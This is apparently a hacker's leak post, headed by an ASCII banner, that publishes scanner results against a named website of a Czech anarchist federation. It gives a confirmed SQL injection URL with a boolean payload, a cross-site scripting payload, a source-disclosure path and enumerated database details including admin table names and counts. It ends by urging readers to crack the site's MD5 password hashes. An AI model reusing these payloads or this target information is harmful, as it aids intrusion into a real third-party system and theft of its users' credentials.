- /\ \ /\ \ /\ \ /\ \
- /::\ \ /::\ \ /::\ \ /::\ \
- /:/\:\ \ /:/\ \ \ /:/\:\ \ /:/\:\ \
- /:/ \:\ \ _\:\~\ \ \ /::\~\:\ \ /::\~\:\ \
- /:/__/ \:\__\ /\ \:\ \ \__\ /:/\:\ \:\__\ /:/\:\ \:\__\
- \:\ \ \/__/ \:\ \:\ \/__/ \/__\:\/:/ / \/__\:\ \/__/
- \:\ \ \:\ \:\__\ \::/ / \:\__\
- \:\ \ \:\/:/ / /:/ / \/__/
- \:\__\ \::/ / /:/ /
- \/__/ \/__/ \/__/
- *- Československá anarchistická federace -*
- ||| Boolean Based SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- URL : http://www.csaf.cz/teoria.php?teor_cl=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: teor_cl
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- ||| Cross-site Scripting
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.csaf.cz/rss_adresa.php?'"--></style></script><script>alert(0x0006E3)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0006E3)</script>
- ||| [Possible] PHP Source Code Disclosure
- Severity: Medium
- Confirmation: Confirmed
- URL: http://www.csaf.cz/obrazky/MD4-log-584jpg
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- ||| Info db
- Target: http://www.csaf.cz/teoria.php?teor_cl=-1 OR 17-7=10
- Web Server: Apache/2.2.16 (Debian)
- Powered-by: PHP/5.3.21-1~dotdeb.0
- DB Server: MySQL
- Resp. Time(avg): 6703 ms
- Current User: csaf@localhost
- Sql Version: 5.1.58-1~dotdeb.1
- Current DB: csaf
- System User: csaf@localhost
- Host Name: csaf.cz
- Installation dir: /usr/
- DB User: 'csaf'@'localhost'
- Data Bases: information_schema, csaf
- |||
- csaf.phpadmin is 2
- |||
- csaf.admin is 1
- |||
- csaf.Operatori is 12
- |||
- In the next decoding md5 strings can anyone continue :)